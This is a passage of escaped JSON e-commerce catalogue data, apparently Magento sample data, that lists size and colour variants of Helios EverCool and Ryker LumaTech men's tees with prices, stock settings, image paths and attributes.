<br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helios-evercool-trade-tee-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"409\":{\"sku\":\"MS05-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Helios EverCool&trade; Tee-L-Black\",\"description\":\"<p>Pumping iron or dialing the track, you\'ve got cool comfort on your side in our short-sleeve Helios EverCool&trade; Tee. The fabric is infused with moisture-wicking technology that pulls sweat off your skin for speedy evaporation. Stretchy fabric gussets encourage ventilation while increasing your range of motion.<\\/p>\\n<p>&bull; Teal quick dry tee.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helios-evercool-trade-tee-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"410\":{\"sku\":\"MS05-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Helios EverCool&trade; Tee-L-Blue\",\"description\":\"<p>Pumping iron or dialing the track, you\'ve got cool comfort on your side in our short-sleeve Helios EverCool&trade; Tee. The fabric is infused with moisture-wicking technology that pulls sweat off your skin for speedy evaporation. Stretchy fabric gussets encourage ventilation while increasing your range of motion.<\\/p>\\n<p>&bull; Teal quick dry tee.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helios-evercool-trade-tee-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms05-blue_back.jpg\",\"image\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms05-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"411\":{\"sku\":\"MS05-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Helios EverCool&trade; Tee-L-Purple\",\"description\":\"<p>Pumping iron or dialing the track, you\'ve got cool comfort on your side in our short-sleeve Helios EverCool&trade; Tee. The fabric is infused with moisture-wicking technology that pulls sweat off your skin for speedy evaporation. Stretchy fabric gussets encourage ventilation while increasing your range of motion.<\\/p>\\n<p>&bull; Teal quick dry tee.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helios-evercool-trade-tee-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"412\":{\"sku\":\"MS05-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Helios EverCool&trade; Tee-XL-Black\",\"description\":\"<p>Pumping iron or dialing the track, you\'ve got cool comfort on your side in our short-sleeve Helios EverCool&trade; Tee. The fabric is infused with moisture-wicking technology that pulls sweat off your skin for speedy evaporation. Stretchy fabric gussets encourage ventilation while increasing your range of motion.<\\/p>\\n<p>&bull; Teal quick dry tee.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helios-evercool-trade-tee-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms05-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"413\":{\"sku\":\"MS05-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Helios EverCool&trade; Tee-XL-Blue\",\"description\":\"<p>Pumping iron or dialing the track, you\'ve got cool comfort on your side in our short-sleeve Helios EverCool&trade; Tee. The fabric is infused with moisture-wicking technology that pulls sweat off your skin for speedy evaporation. Stretchy fabric gussets encourage ventilation while increasing your range of motion.<\\/p>\\n<p>&bull; Teal quick dry tee.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helios-evercool-trade-tee-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms05-blue_back.jpg\",\"image\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms05-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"414\":{\"sku\":\"MS05-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Helios EverCool&trade; Tee-XL-Purple\",\"description\":\"<p>Pumping iron or dialing the track, you\'ve got cool comfort on your side in our short-sleeve Helios EverCool&trade; Tee. The fabric is infused with moisture-wicking technology that pulls sweat off your skin for speedy evaporation. Stretchy fabric gussets encourage ventilation while increasing your range of motion.<\\/p>\\n<p>&bull; Teal quick dry tee.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"helios-evercool-trade-tee-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms05-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},\"415\":{\"sku\":\"MS05\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Helios EverCool&trade; Tee\",\"description\":\"<p>Pumping iron or dialing the track, you\'ve got cool comfort on your side in our short-sleeve Helios EverCool&trade; Tee. The fabric is infused with moisture-wicking technology that pulls sweat off your skin for speedy evaporation. Stretchy fabric gussets encourage ventilation while increasing your range of motion.<\\/p>\\n<p>&bull; Teal quick dry tee.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tee,material=EverCool&trade;|Lycra&reg;|Organic Cotton,pattern=Solid,climate=All-weather|Indoor|Warm,eco_collection=Yes,performance_fabric=Yes,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MS05-XS-Black,size=XS,color=Black|sku=MS05-XS-Blue,size=XS,color=Blue|sku=MS05-XS-Purple,size=XS,color=Purple|sku=MS05-S-Black,size=S,color=Black|sku=MS05-S-Blue,size=S,color=Blue|sku=MS05-S-Purple,size=S,color=Purple|sku=MS05-M-Black,size=M,color=Black|sku=MS05-M-Blue,size=M,color=Blue|sku=MS05-M-Purple,size=M,color=Purple|sku=MS05-L-Black,size=L,color=Black|sku=MS05-L-Blue,size=L,color=Blue|sku=MS05-L-Purple,size=L,color=Purple|sku=MS05-XL-Black,size=XL,color=Black|sku=MS05-XL-Blue,size=XL,color=Blue|sku=MS05-XL-Purple,size=XL,color=Purple\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms05-blue_back.jpg\",\"image\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms05-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tee\",\"material\":\"EverCool&trade;|Lycra&reg;|Organic Cotton\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Indoor|Warm\",\"eco_collection\":\"Yes\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"416\":{\"sku\":\"MS09-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Ryker LumaTech&trade; Tee (Crew-neck)-XS-Black\",\"description\":\"<p>The crew-neck Ryker LumaTech&trade; Tee hides premium performance technology beneath unassuming looks. The featherweight blend of fabrics wicks away moisture to keep you cool and dry in every phase of your active life.<\\/p>\\n<p>&bull; Royal polyester tee with black accents.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeve. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ryker-lumatech-trade-tee-crew-neck-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms09-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms09-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms09-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\